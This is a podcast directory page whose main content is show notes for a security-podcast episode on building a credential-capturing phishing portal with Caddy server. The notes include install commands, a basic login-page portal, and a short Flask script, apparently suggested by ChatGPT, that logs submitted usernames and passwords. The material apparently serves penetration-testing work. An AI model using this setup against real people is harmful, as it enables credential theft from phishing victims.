7MS #583: Cred-Capturing Phishing with Caddy Server episode artwork

EPISODE · Aug 4, 2023 · 29 MIN

7MS #583: Cred-Capturing Phishing with Caddy Server

from 7 Minute Security

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile: domain.com Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal: Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; } User Name: Password: Unauthorized use is prohibited! This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher: from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) If you don't have Flask installed, do this: sudo apt install python3-pip -y sudo pip install Flask Run this file in one session, then in your index.html file make a small tweak in the form action directive: Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

Episode metadata supplied by the publisher feed · Published Aug 4, 2023

NOW PLAYING

7MS #583: Cred-Capturing Phishing with Caddy Server

0:00 29:37

No transcript for this episode yet

We transcribe on demand. Request one and we'll notify you when it's ready — usually under 10 minutes.

Wild WinsDay Wild WinsDay Pump the hump with WILD WINSday 🐪💪: Your 3-minute weekly video boost for leadership, sales, marketing, and business breakthroughs to WIN the day! The Course Mentors Podcast The Course Mentors Hey there, future course creator!Ever feel like turning your know-how into an online course is like trying to solve a Rubik's cube blindfolded? Well, grab your headphones because "The Course Mentors Podcast" is here to be your secret weapon!Meet Aimee and Odette (that's us!), your new best friends in the course creation world. We've been in the trenches for over a decade, and for the last five years, we've been rocking the online course space. Now we're here to spill all our secrets in bite-sized, 15-20 minute episodes that'll fit perfectly in your coffee breaks.No fluff, no filler - just real, actionable advice that'll take you from "um, what's a landing page?" to "holy moly, I just hit six figures!". We're talking everything from crafting your course to marketing it like a pro and building a business that'll have you pinching yourself.Whether you're dreaming of ditching the 9-to-5 grind, adding a sweet extra income str Gooday Gaming Guests FFF Gaming Emporium These are my Daily Messages in a Bottle sent over the internet Ocean for anyone to find. Listen to a Quick 20-minute Journey into my Life's Passions Work a Few Times a Day. I am 57. I Grew Up on All Gaming and Computing. I am a Seller of Gaming Parts on eBay and Etsy. In the past 8 years, I have learned about every system ever made. I am also an Enthusiast, Collector and Hobbyist of all Vintage Computing from the Very Beginning. In the last Few Years, I have been sharing my knowledge with others on YouTube, TikTok and Now this Pod Cast.See where all the Magic Happens:FFF Gaming Emporium | eBay Storeshttps://www.youtube.com/channel/UCDrdCmDQ52AsCWTWAhE7JEQ/<a target="_blank" rel="noopener noreferrer nofollow" href="https://www Wisdom's Proof JesusLifeTogether In a world of religion, ritual, hierarchy, control, money, marketing, and more flavors than 10,000 Baskin Robbins — how can we know what is Right and True? Some just give up. Bad move. JESUS LIVES and REIGNS! Some simply "go along to get along" to conform to culture and biological family. Really bad move, unless you are a lemming and don't care about the destiny someone else has chosen for you. But then JESUS, knowing this day would come, said, "By their fruit you shall know them" and "Wisdom is PROVED RIGHT by all her CHILDREN." Luke 7:35 Find some random offspring from whatever you wish you knew more about, look carefully at the second generation, and see if the gates of Hell are prevailing — as they would in a "mere words" and "mere ceremonies" attendance-based religious organization. OR, is satan getting busted in the mouth by that second generation? What is the fruit and the quality of LIVES of the children - once they can make their own choices? Then you'll Know. Wisdom is PROVED

Frequently Asked Questions

How long is this episode of 7 Minute Security?

This episode is 29 minutes long.

When was this 7 Minute Security episode published?

This episode was published on August 4, 2023.

What is this episode about?

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf...

Can I download this 7 Minute Security episode?

Yes, you can download this episode by clicking the download button on the episode player, or subscribe to the podcast in your preferred podcast app for automatic downloads.
URL copied to clipboard!